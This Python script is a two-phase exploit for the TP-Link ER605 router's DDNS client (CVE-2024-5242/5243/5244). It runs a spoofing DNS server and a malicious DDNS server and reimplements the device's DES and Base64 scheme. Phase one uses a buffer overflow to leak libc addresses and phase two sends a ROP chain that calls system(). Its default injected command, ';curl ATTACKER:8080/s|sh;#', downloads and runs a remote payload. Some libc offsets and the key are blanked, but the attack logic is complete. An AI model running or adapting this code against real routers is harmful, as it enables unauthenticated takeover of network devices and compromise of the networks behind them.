#!/usr/bin/env python3
"""
CVE-2024-5242 / CVE-2024-5243 / CVE-2024-5244
TP-Link ER605 cmxddnsd Pre-Auth RCE Exploit
============================================

Two-phase exploit:
  Phase 1: Info leak via BSS overflow to bypass ASLR
  Phase 2: ROP chain via stack overflow for RCE

Prerequisites:
  - MITM position on target router's WAN interface
  - Ability to intercept DNS queries and spoof responses
  - Ability to serve malicious DDNS responses on UDP 9994

Key insight: ErrorCode value is cached in libc's anonymous mapping region.
This address is NULL-free, making it usable in the ROP payload.

Gadget (MIPS delay slot):
  move $t9, $s0     ; $t9 = system address
  jalr $t9          ; call system()
  move $a0, $s1     ; DELAY SLOT: $a0 = command string

Payload Layout:
  [0-N]:    "7;cmd;" - atoi returns 7, shell executes cmd
  [N-43]:   padding
  [44-47]:  $s0 = system()
  [48-51]:  $s1 = command string address (libc anon region)
  [52-55]:  $ra = ROP gadget
  [56]:     0x01 (field separator)
"""

import socket
import struct
import threading
import sys
import os
import base64
import time

# ============================================================================
# Configuration
# ============================================================================

# Address both UDP servers bind to (all IPv4 interfaces).
LISTEN_IP = "0.0.0.0"
DNS_PORT = 53      # DNS server port; main() notes binding it requires root
DDNS_PORT = 9994   # UDP port the DDNS responses are served on

# NOTE(review): ATTACKER_IP is read from the environment but is not referenced
# anywhere in the visible code; main() takes the attacker IP from argv instead.
ATTACKER_IP = os.environ.get('ATTACKER_IP', '192.168.0.100')

# ============================================================================
# Addresses and Offsets (REDACTED - fill in based on target libc)
# ============================================================================

# libc offsets - must be determined through reverse engineering
LIBC_CMD_OFFSET = 0x0        # Where ErrorCode string is cached (must be NULL-free)
LIBC_SYSTEM_OFFSET = 0x0     # system() function offset
LIBC_GADGET_OFFSET = 0x0     # ROP gadget: move $t9,$s0; jalr $t9; move $a0,$s1
# 0x0 is the "not configured" sentinel for the three offsets above:
# main() prints a warning if any of them is still 0x0.

# Info leak configuration
OFFSET_TO_SENDSIZE = 279     # Distance to sendSize variable in _sndDnsQuery
INFO_LEAK_SIZE = 0x0404      # Size to trigger in OOB read
# build_info_leak_payload() packs INFO_LEAK_SIZE as a little-endian uint16,
# so it must fit in 16 bits.

# Info leak analysis offsets - must be determined through dynamic analysis
LEAK_POINTER_OFFSET = 0x0    # Offset in leaked data containing libc pointer
LEAK_TO_LIBC_OFFSET = 0x0    # Offset from leaked pointer to libc base

# ErrorCode stack overflow offsets (fixed based on binary analysis)
# build_rop_payload() writes a 4-byte value at each offset below into its
# fixed 57-byte buffer. It also uses ERRORCODE_TO_S0 as the maximum length
# of the "7" + command prefix.
ERRORCODE_TO_S0 = 44         # Offset from ErrorCode buffer to saved $s0
ERRORCODE_TO_S1 = 48         # Offset from ErrorCode buffer to saved $s1
ERRORCODE_TO_RA = 52         # Offset from ErrorCode buffer to saved $ra

# ============================================================================
# Crypto Implementation (CVE-2024-5244)
# ============================================================================

# Hardcoded DES key from binary (after extraction from .rodata)
# Placeholder of eight zero bytes. tplink_encrypt() passes it through
# vnc_key() (per-byte bit reversal) before using it as the DES key.
DES_KEY_RAW = bytes([0x00] * 8)  # REDACTED - extract from binary

# Custom Base64 alphabet
# ENCODE_TABLE maps each standard Base64 character to the character at the
# same index in TPL_B64:
#   - letter case is swapped;
#   - digits are unchanged;
#   - '+' becomes '*' and '/' becomes '_'.
# '=' padding is not in the table, so it passes through unchanged.
STD_B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TPL_B64 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789*_"
ENCODE_TABLE = str.maketrans(STD_B64, TPL_B64)

def p32(v):
    """Encode ``v`` modulo 2**32 as 4 little-endian bytes."""
    masked = v & 0xffffffff
    return struct.pack('<I', masked)


def u32(d):
    """Decode exactly 4 little-endian bytes into an unsigned integer."""
    (value,) = struct.unpack('<I', d)
    return value

def vnc_key(key):
    """Mirror the bit order of each of the first 8 key bytes (VNC-style DES key).

    If ``key`` has fewer than 8 entries, the missing positions are treated as
    zero. Entries beyond the eighth are ignored. Always returns 8 bytes.
    """
    def mirror(octet):
        # Bit k of the input becomes bit (7 - k) of the output.
        return sum(1 << (7 - k) for k in range(8) if (octet >> k) & 1)

    head = list(key[:8])
    head += [0] * (8 - len(head))
    return bytes(mirror(octet) for octet in head)

# DES S-boxes
# Intended to be the standard DES S-boxes (FIPS 46-3). Each inner list is one
# S-box flattened row-major as 4 rows x 16 columns: des_f() reads entry
# row * 16 + col.
SBOXES = [
    [14,4,13,1,2,15,11,8,3,10,6,12,5,9,0,7,0,15,7,4,14,2,13,1,10,6,12,11,9,5,3,8,4,1,14,8,13,6,2,11,15,12,9,7,3,10,5,0,15,12,8,2,4,9,1,7,5,11,3,14,10,0,6,13],
    [15,1,8,14,6,11,3,4,9,7,2,13,12,0,5,10,3,13,4,7,15,2,8,14,12,0,1,10,6,9,11,5,0,14,7,11,10,4,13,1,5,8,12,6,9,3,2,15,13,8,10,1,3,15,4,2,11,6,7,12,0,5,14,9],
    [10,0,9,14,6,3,15,5,1,13,12,7,11,4,2,8,13,7,0,9,3,4,6,10,2,8,5,14,12,11,15,1,13,6,4,9,8,15,3,0,11,1,2,12,5,10,14,7,1,10,13,0,6,9,8,7,4,15,14,3,11,5,2,12],
    [7,13,14,3,0,6,9,10,1,2,8,5,11,12,4,15,13,8,11,5,6,15,0,3,4,7,2,12,1,10,14,9,10,6,9,0,12,11,7,13,15,1,3,14,5,2,8,4,3,15,0,6,10,1,13,8,9,4,5,11,12,7,2,14],
    [2,12,4,1,7,10,11,6,8,5,3,15,13,0,14,9,14,11,2,12,4,7,13,1,5,0,15,10,3,9,8,6,4,2,1,11,10,13,7,8,15,9,12,5,6,3,0,14,11,8,12,7,1,14,2,13,6,15,0,9,10,4,5,3],
    [12,1,10,15,9,2,6,8,0,13,3,4,14,7,5,11,10,15,4,2,7,12,9,5,6,1,13,14,0,11,3,8,9,14,15,5,2,8,12,3,7,0,4,10,1,13,11,6,4,3,2,12,9,5,15,10,11,14,1,7,6,0,8,13],
    [4,11,2,14,15,0,8,13,3,12,9,7,5,10,6,1,13,0,11,7,4,9,1,10,14,3,5,12,2,15,8,6,1,4,11,13,12,3,7,14,10,15,6,8,0,5,9,2,6,11,13,8,1,4,10,7,9,5,0,15,14,2,3,12],
    [13,2,8,4,6,15,11,1,10,9,3,14,5,0,12,7,1,15,13,8,10,3,7,4,12,5,6,11,0,14,9,2,7,11,4,1,9,12,14,2,0,6,10,13,15,3,5,8,2,1,14,7,4,10,8,13,15,12,9,0,3,5,6,11]
]

# DES permutation tables
# Entries are 1-based bit positions; permute() subtracts 1 when indexing.
# Table roles:
#   IP / IP_INV  - initial and final permutations (64 -> 64)
#   E            - expansion (32 -> 48)
#   P            - round permutation (32 -> 32)
#   PC1 / PC2    - key-schedule selections (64 -> 56 and 56 -> 48)
#   SHIFTS       - per-round left-rotation amounts for the two 28-bit key halves
IP = [58,50,42,34,26,18,10,2,60,52,44,36,28,20,12,4,62,54,46,38,30,22,14,6,64,56,48,40,32,24,16,8,57,49,41,33,25,17,9,1,59,51,43,35,27,19,11,3,61,53,45,37,29,21,13,5,63,55,47,39,31,23,15,7]
IP_INV = [40,8,48,16,56,24,64,32,39,7,47,15,55,23,63,31,38,6,46,14,54,22,62,30,37,5,45,13,53,21,61,29,36,4,44,12,52,20,60,28,35,3,43,11,51,19,59,27,34,2,42,10,50,18,58,26,33,1,41,9,49,17,57,25]
E = [32,1,2,3,4,5,4,5,6,7,8,9,8,9,10,11,12,13,12,13,14,15,16,17,16,17,18,19,20,21,20,21,22,23,24,25,24,25,26,27,28,29,28,29,30,31,32,1]
P = [16,7,20,21,29,12,28,17,1,15,23,26,5,18,31,10,2,8,24,14,32,27,3,9,19,13,30,6,22,11,4,25]
PC1 = [57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4]
PC2 = [14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,41,52,31,37,47,55,30,40,51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32]
SHIFTS = [1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1]

def permute(block, table):
    """Return the entries of ``block`` picked by the 1-based positions in ``table``."""
    return [block[position - 1] for position in table]


def xor(a, b):
    """Pairwise XOR of two sequences, stopping at the shorter one."""
    return [left ^ right for left, right in zip(a, b)]

def bytes_to_bits(data):
    """Expand bytes into a flat list of 0/1 ints, most significant bit first."""
    return [(octet >> shift) & 1 for octet in data for shift in range(7, -1, -1)]

def bits_to_bytes(bits):
    """Pack a flat MSB-first bit list back into bytes.

    The length of ``bits`` is expected to be a multiple of 8; a trailing
    partial group raises IndexError.
    """
    packed = bytearray()
    for start in range(0, len(bits), 8):
        octet = 0
        for bit in (bits[start + k] for k in range(8)):
            octet = (octet << 1) | bit
        packed.append(octet)
    return bytes(packed)

def des_key_schedule(key_bits):
    """Derive one 48-bit DES round key per entry in SHIFTS from a 64-bit key.

    Steps:
      1. PC1 reduces the key to 56 bits.
      2. The result is split into two 28-bit halves.
      3. Each round rotates both halves left by SHIFTS[round] and compresses
         the concatenation to 48 bits with PC2.
    """
    def rotate_left(half, count):
        return half[count:] + half[:count]

    reduced = permute(key_bits, PC1)
    c_half, d_half = reduced[:28], reduced[28:]
    subkeys = []
    for amount in SHIFTS:
        c_half = rotate_left(c_half, amount)
        d_half = rotate_left(d_half, amount)
        subkeys.append(permute(c_half + d_half, PC2))
    return subkeys

def des_f(R, K):
    """DES round function on a 32-bit half block ``R`` with 48-bit round key ``K``.

    Steps:
      1. Expand R with E.
      2. XOR in K.
      3. Pass each 6-bit group through its S-box (outer bits choose the row,
         inner four bits the column).
      4. Apply P to the concatenated 4-bit outputs.
    """
    mixed = xor(permute(R, E), K)
    substituted = []
    for idx, sbox in enumerate(SBOXES):
        six = mixed[idx * 6:idx * 6 + 6]
        outer = (six[0] << 1) | six[5]
        inner = (six[1] << 3) | (six[2] << 2) | (six[3] << 1) | six[4]
        nibble = sbox[outer * 16 + inner]
        substituted.extend((nibble >> shift) & 1 for shift in (3, 2, 1, 0))
    return permute(substituted, P)

def des_encrypt_block(block_bits, round_keys):
    """Encrypt one 64-bit block (as a bit list) with 16 Feistel rounds.

    Uses round_keys[0] .. round_keys[15] in order. The final halves are
    swapped before the inverse initial permutation.
    """
    state = permute(block_bits, IP)
    left, right = state[:32], state[32:]
    for rnd in range(16):
        # Right-hand side is fully evaluated with the old halves before rebinding.
        left, right = right, xor(left, des_f(right, round_keys[rnd]))
    return permute(right + left, IP_INV)

def des_encrypt(key8, plaintext):
    """DES-encrypt ``plaintext`` block by block (ECB) under the 8-byte ``key8``.

    Padding always appends N bytes of value N (1 <= N <= 8). Input that is
    already a multiple of 8 bytes therefore gains one full extra block.
    """
    schedule = des_key_schedule(bytes_to_bits(key8))
    fill = 8 - len(plaintext) % 8
    padded = plaintext + bytes([fill]) * fill
    return b''.join(
        bits_to_bytes(des_encrypt_block(bytes_to_bits(padded[pos:pos + 8]), schedule))
        for pos in range(0, len(padded), 8)
    )

def custom_b64_encode(data):
    """Base64-encode ``data`` and remap it onto Comexe's alphabet (TPL_B64).

    '=' padding is not part of the remapping and is emitted unchanged.
    """
    ascii_b64 = base64.b64encode(data).decode()
    return ascii_b64.translate(ENCODE_TABLE)

def tplink_encrypt(data):
    """DES-encrypt ``data`` under the bit-reversed DES_KEY_RAW, then custom-Base64 it.

    ``data`` may be str (UTF-8 encoded first) or bytes. Returns a str.
    """
    raw = data.encode() if isinstance(data, str) else data
    key = vnc_key(DES_KEY_RAW)
    return custom_b64_encode(des_encrypt(key, raw))

def build_ddns_packet(payload):
    """Wrap a plaintext record in the encrypted DDNS response envelope.

    Layout: 0x01 "C=2" 0x01 "Data=" <tplink_encrypt(payload)> 0x01.
    ``payload`` may be str (UTF-8 encoded first) or bytes. Returns bytes.
    """
    body = payload.encode() if isinstance(payload, str) else payload
    encoded = tplink_encrypt(body).encode()
    return b''.join((b'\x01C=2\x01Data=', encoded, b'\x01'))

# ============================================================================
# Helpers
# ============================================================================

def check_null_bytes(addr, name):
    """Warn if the little-endian 32-bit encoding of ``addr`` contains 0x00.

    Returns True (after printing a warning) when a NULL byte is present,
    otherwise False.
    """
    packed = p32(addr)
    if b'\x00' not in packed:
        return False
    print(f"[!] WARNING: {name} (0x{addr:08x}) contains NULL byte: {packed.hex()}")
    return True

# ============================================================================
# Phase 1: Info Leak (CVE-2024-5242)
# ============================================================================

def build_info_leak_payload():
    """
    Build payload for BSS overflow -> OOB read info leak.
    
    Overwrites sendSize variable in _sndDnsQuery stack frame,
    causing sendto() to transmit extra memory containing libc pointers.

    Returns the plaintext 0x01-separated record as bytes. DDNSServer wraps
    it with build_ddns_packet() before sending.
    """
    # Pad to reach sendSize, then overwrite with large value
    dns_name = b'A' * OFFSET_TO_SENDSIZE
    dns_name += struct.pack('<H', INFO_LEAK_SIZE)
    dns_name += b'/'  # Terminate the copy loop
    
    # Fields are separated by 0x01 bytes. Adjacent bytes literals are joined
    # at compile time; dns_name is spliced in with '+'.
    payload = (
        b'\x01OK=N'
        b'\x01MSG=Error'
        b'\x01ErrorCode=7'           # Triggers UpdateSvr parsing
        b'\x01UpdateSvr1=' + dns_name +
        b'\x01UpdateSvr2=Dns1.comexe.net'
        b'\x01'
    )
    return payload

def analyze_leak(data):
    """
    Analyze leaked data to extract libc base address.
    
    The oversized DNS query contains memory from ddns_instance structure,
    which includes libc pointers that can be used to calculate libc base.

    Args:
        data: raw bytes of the captured (oversized) DNS query.

    Returns:
        The 4-byte little-endian value at LEAK_POINTER_OFFSET minus
        LEAK_TO_LIBC_OFFSET, or None if ``data`` is too short.

    NOTE(review): the result is not range-checked (it can be 0 or negative).
    The caller in DNSServer treats a falsy result (including 0) as failure.
    """
    print(f"\n[LEAK] Received {len(data)} bytes")
    
    if len(data) < LEAK_POINTER_OFFSET + 4:
        print(f"[!] Data too short, need at least {LEAK_POINTER_OFFSET + 4} bytes")
        return None
    
    leaked_ptr = u32(data[LEAK_POINTER_OFFSET:LEAK_POINTER_OFFSET+4])
    libc_base = leaked_ptr - LEAK_TO_LIBC_OFFSET
    
    print(f"[+] Leaked pointer: 0x{leaked_ptr:08x}")
    print(f"[+] libc_base = 0x{libc_base:08x}")
    
    return libc_base

# ============================================================================
# Phase 2: ROP Exploit (CVE-2024-5243)
# ============================================================================

def build_rop_payload(libc_base, command):
    """
    Build ROP payload for ErrorCode stack overflow.
    
    The ErrorCode string is cached in libc's anonymous mapping region,
    which provides a NULL-free address for the command string.

    Args:
        libc_base: libc base address (e.g. the value computed by analyze_leak()).
        command: shell text appended after the leading "7".

    Returns:
        The 57-byte payload as ``bytes``, or None if "7" + command is longer
        than ERRORCODE_TO_S0 bytes. NULL bytes in the computed addresses only
        produce a printed warning; the payload is still returned.
    """
    cmd_addr = libc_base + LIBC_CMD_OFFSET
    system_addr = libc_base + LIBC_SYSTEM_OFFSET
    gadget_addr = libc_base + LIBC_GADGET_OFFSET
    
    print(f"\n[ROP] Building exploit payload")
    print(f"      libc_base:     0x{libc_base:08x}")
    print(f"      cmd_addr:      0x{cmd_addr:08x} (libc + 0x{LIBC_CMD_OFFSET:x})")
    print(f"      system:        0x{system_addr:08x}")
    print(f"      gadget:        0x{gadget_addr:08x}")
    print(f"      command:       {command}")
    
    # Verify no NULL bytes in addresses
    has_null = False
    has_null |= check_null_bytes(cmd_addr, "cmd_addr")
    has_null |= check_null_bytes(system_addr, "system")
    has_null |= check_null_bytes(gadget_addr, "gadget")
    
    if has_null:
        print(f"\n[!] NULL byte detected! Exploit may fail.")
    
    # Build payload (57 bytes total)
    # Every index 0..56 is written below, so the zero initialization never
    # reaches the output.
    payload = bytearray(57)
    
    # Command string: "7" + shell command
    # "7" makes atoi() return 7, enabling normal function return
    full_cmd = f"7{command}"
    cmd_bytes = full_cmd.encode()
    cmd_len = len(cmd_bytes)
    
    # cmd_len includes the leading "7".
    if cmd_len > ERRORCODE_TO_S0:
        print(f"[!] Command too long! Max {ERRORCODE_TO_S0} bytes, got {cmd_len}")
        return None
    
    # [0-N]: Command string
    payload[0:cmd_len] = cmd_bytes
    
    # [N-43]: Padding
    for i in range(cmd_len, ERRORCODE_TO_S0):
        payload[i] = ord('A')
    
    # [44-47]: $s0 = system()
    payload[ERRORCODE_TO_S0:ERRORCODE_TO_S0+4] = p32(system_addr)
    
    # [48-51]: $s1 = command string address
    payload[ERRORCODE_TO_S1:ERRORCODE_TO_S1+4] = p32(cmd_addr)
    
    # [52-55]: $ra = ROP gadget
    payload[ERRORCODE_TO_RA:ERRORCODE_TO_RA+4] = p32(gadget_addr)
    
    # [56]: Field separator
    # NOTE(review): index 56 and the ranges printed below are hard-coded
    # rather than derived from the ERRORCODE_TO_* constants. They would go
    # stale if those constants changed.
    payload[56] = 0x01
    
    print(f"\n[ROP] ErrorCode payload ({len(payload)} bytes):")
    print(f"      [0-{cmd_len-1}]:   '7{command}' (atoi=7 + shell cmd)")
    print(f"      [{cmd_len}-43]:  'A' padding")
    print(f"      [44-47]:  $s0 = 0x{system_addr:08x} (system)")
    print(f"      [48-51]:  $s1 = 0x{cmd_addr:08x} (cmd in libc anon)")
    print(f"      [52-55]:  $ra = 0x{gadget_addr:08x} (gadget)")
    print(f"      [56]:     0x01 (separator)")
    
    return bytes(payload)

def build_exploit_response(libc_base, command):
    """Build complete exploit DDNS response packet

    Returns the encrypted packet (bytes) from build_ddns_packet(), or None
    when build_rop_payload() rejects the command.
    """
    errorcode_payload = build_rop_payload(libc_base, command)
    if errorcode_payload is None:
        return None
    
    # errorcode_payload already ends with a 0x01 byte, which acts as the
    # separator before "UpdateSvr1=".
    inner = (
        b'\x01OK=N'
        b'\x01MSG=pwned'
        b'\x01ErrorCode=' + errorcode_payload +
        b'UpdateSvr1=x'
        b'\x01'
    )
    
    print(f"\n[ROP] Exploit packet built")
    
    return build_ddns_packet(inner)

# ============================================================================
# Servers
# ============================================================================

class ExploitState:
    """Shared state between DNS and DDNS servers"""
    def __init__(self):
        self.phase = 1           # 1 = info leak, 2 = ROP exploit
        self.libc_base = None    # set by DNSServer.handle_packet once a leak is parsed
        self.exploit_sent = False  # set by DDNSServer after sending the phase-2 packet
        self.lock = threading.Lock()  # held by both servers around phase transitions
        self.command = ";touch /tmp/pwned;"  # default; main() overwrites it

class DNSServer:
    """
    Malicious DNS server that:
    1. Spoofs responses to redirect DDNS traffic to attacker
    2. Captures oversized queries for info leak analysis

    Every query of at least 12 bytes gets a reply with one A record pointing
    at ``spoof_ip``. While ``state.phase == 1``, any query longer than
    100 bytes is also passed to analyze_leak().
    """
    def __init__(self, state, spoof_ip):
        # state: shared ExploitState; spoof_ip: dotted-quad IPv4 string placed in every answer
        self.state = state
        self.spoof_ip = spoof_ip
        self.sock = None       # UDP socket, created in start()
        self.running = False   # loop flag polled by start(); cleared by stop()
        
    def handle_packet(self, data, addr):
        """Process one raw DNS query; return the spoofed response bytes, or None.

        ``addr`` is not used here; the caller uses it to address the reply.
        """
        # Check for info leak (oversized DNS query)
        # phase is only written by this thread (below), so the unlocked read
        # here is consistent with the locked write.
        if len(data) > 100 and self.state.phase == 1:
            print(f"\n[PHASE 1] INFO LEAK! Size: {len(data)} bytes")
            with self.state.lock:
                libc_base = analyze_leak(data)
                if libc_base:
                    self.state.libc_base = libc_base
                    self.state.phase = 2
                    print(f"\n[+] Moving to Phase 2 - ROP Exploit")
        
        # Build spoofed DNS response
        # 12 bytes is the size of the DNS header.
        if len(data) >= 12:
            txid = data[:2]
            response = txid + bytes([
                0x81, 0x80,  # Flags: response, no error
                0x00, 0x01,  # Questions: 1
                0x00, 0x01,  # Answers: 1
                0x00, 0x00,  # Authority: 0
                0x00, 0x00   # Additional: 0
            ])
            # NOTE(review): everything after the header is echoed back. This
            # assumes the query holds exactly one question and no extra
            # records (e.g. EDNS OPT) — TODO confirm for the target resolver.
            response += data[12:]  # Copy question section
            response += bytes([
                0xc0, 0x0c,  # Name pointer
                0x00, 0x01,  # Type: A
                0x00, 0x01,  # Class: IN
                0x00, 0x00, 0x00, 0x3c,  # TTL: 60
                0x00, 0x04   # Data length: 4
            ])
            response += socket.inet_aton(self.spoof_ip)
            return response
        return None
        
    def start(self):
        """Bind the UDP DNS socket and serve until stop() clears ``running``.

        The 1-second receive timeout lets the loop re-check ``running``.
        Other exceptions are printed (only while running) and the loop
        continues.
        """
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((LISTEN_IP, DNS_PORT))
        self.sock.settimeout(1.0)
        self.running = True
        print(f"[DNS] Server listening on port {DNS_PORT}")
        
        while self.running:
            try:
                data, addr = self.sock.recvfrom(4096)
                response = self.handle_packet(data, addr)
                if response:
                    self.sock.sendto(response, addr)
            except socket.timeout:
                continue
            except Exception as e:
                if self.running:
                    print(f"[DNS] Error: {e}")
                    
    def stop(self):
        """Clear the run flag and close the socket, if one was created."""
        self.running = False
        if self.sock:
            self.sock.close()

class DDNSServer:
    """
    Malicious DDNS server that sends exploit payloads.
    Phase 1: Info leak payload
    Phase 2: ROP exploit payload

    After the phase-2 packet has been sent (or whenever neither phase
    branch applies), every request gets a fixed "OK=Y / ErrorCode=0" reply.
    """
    def __init__(self, state):
        # state: shared ExploitState read and updated under state.lock
        self.state = state
        self.sock = None       # UDP socket, created in start()
        self.running = False   # loop flag polled by start(); cleared by stop()
        
    def start(self):
        """Bind the UDP DDNS socket and answer requests until stop() is called.

        Runs in the calling thread (main() calls it directly). Each request
        is handled while holding ``state.lock``. Unexpected exceptions are
        printed with a traceback (only while running) and the loop continues.
        """
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((LISTEN_IP, DDNS_PORT))
        self.sock.settimeout(1.0)
        self.running = True
        print(f"[DDNS] Server listening on port {DDNS_PORT}")
        
        while self.running:
            try:
                data, addr = self.sock.recvfrom(4096)
                print(f"\n[DDNS] Request from {addr[0]}:{addr[1]}")
                
                with self.state.lock:
                    if self.state.phase == 1:
                        print(f"\n{'='*60}")
                        print(f"[PHASE 1] Sending info leak payload")
                        print(f"{'='*60}")
                        payload = build_info_leak_payload()
                        response = build_ddns_packet(payload)
                        self.sock.sendto(response, addr)
                        
                    elif self.state.phase == 2 and not self.state.exploit_sent:
                        print(f"\n{'='*60}")
                        print(f"[PHASE 2] Sending ROP exploit!")
                        print(f"{'='*60}")
                        
                        response = build_exploit_response(
                            self.state.libc_base,
                            self.state.command
                        )
                        
                        if response:
                            self.sock.sendto(response, addr)
                            self.state.exploit_sent = True
                            print(f"\n[+] Exploit sent! Check for shell connection.")
                        else:
                            # exploit_sent stays False, so the next request retries phase 2.
                            print("[!] Failed to build exploit")
                            # Send benign response
                            benign = b'\x01OK=Y\x01MSG=Success\x01ErrorCode=0\x01'
                            response = build_ddns_packet(benign)
                            self.sock.sendto(response, addr)
                    else:
                        # Already exploited or benign response
                        benign = b'\x01OK=Y\x01MSG=Success\x01ErrorCode=0\x01'
                        response = build_ddns_packet(benign)
                        self.sock.sendto(response, addr)
                        
            except socket.timeout:
                continue
            except Exception as e:
                if self.running:
                    print(f"[DDNS] Error: {e}")
                    import traceback
                    traceback.print_exc()
                    
    def stop(self):
        """Clear the run flag and close the socket, if one was created."""
        self.running = False
        if self.sock:
            self.sock.close()

# ============================================================================
# Main
# ============================================================================

def print_banner():
    """Print the static startup banner to stdout."""
    print("""
╔═══════════════════════════════════════════════════════════════════════╗
║     CVE-2024-5242/5243/5244 - TP-Link ER605 Pre-Auth RCE Exploit      ║
╠═══════════════════════════════════════════════════════════════════════╣
║  Prerequisites:                                                       ║
║    - MITM position on target's WAN interface                          ║
║    - Intercept DNS queries, spoof responses to attacker IP            ║
║                                                                       ║
║  Attack Flow:                                                         ║
║    Phase 1: BSS overflow → OOB read → libc address leak               ║
║    Phase 2: Stack overflow → ROP chain → system(command)              ║
║                                                                       ║
║  ROP Gadget: move $t9,$s0; jalr $t9; move $a0,$s1                     ║
╚═══════════════════════════════════════════════════════════════════════╝
    """)

def main():
    """Entry point: parse argv, start the DNS thread, run the DDNS loop.

    Usage: main reads the attacker IP from ``sys.argv[1]``.

    Returns:
        1 on a usage error; 0 after a Ctrl+C shutdown.
    """
    print_banner()
    
    # Check if offsets are configured
    if LIBC_CMD_OFFSET == 0x0 or LIBC_SYSTEM_OFFSET == 0x0 or LIBC_GADGET_OFFSET == 0x0:
        print("[!] WARNING: libc offsets not configured!")
        print("[!] Edit the script to fill in the offset values for your target.")
        print()
    
    if len(sys.argv) < 2:
        print(f"Usage: sudo {sys.argv[0]} <ATTACKER_IP>")
        print(f"Example: sudo {sys.argv[0]} 192.168.0.100")
        return 1
    
    attacker_ip = sys.argv[1]
    command = f";curl {attacker_ip}:8080/s|sh;#"
    
    print(f"[*] Attacker IP: {attacker_ip}")
    print(f"[*] Command: {command}")
    
    # Initialize state
    state = ExploitState()
    state.command = command
    
    # Start DNS server (requires root)
    # Daemon thread, so it does not keep the process alive after main returns.
    dns = DNSServer(state, attacker_ip)
    dns_thread = threading.Thread(target=dns.start, daemon=True)
    dns_thread.start()
    
    # Start DDNS server
    ddns = DDNSServer(state)
    
    print(f"\n[*] Servers started!")
    print(f"[*] Waiting for target connection...")
    print(f"[*] (Target must resolve Dns1.comexe.net to {attacker_ip})")
    print(f"[*] Press Ctrl+C to stop\n")
    
    # ddns.start() blocks in this thread until interrupted.
    try:
        ddns.start()
    except KeyboardInterrupt:
        print("\n[*] Stopping...")
        dns.stop()
        ddns.stop()
    
    return 0

# Use main()'s return value (1 on usage error, 0 otherwise) as the exit status.
if __name__ == "__main__":
    sys.exit(main())
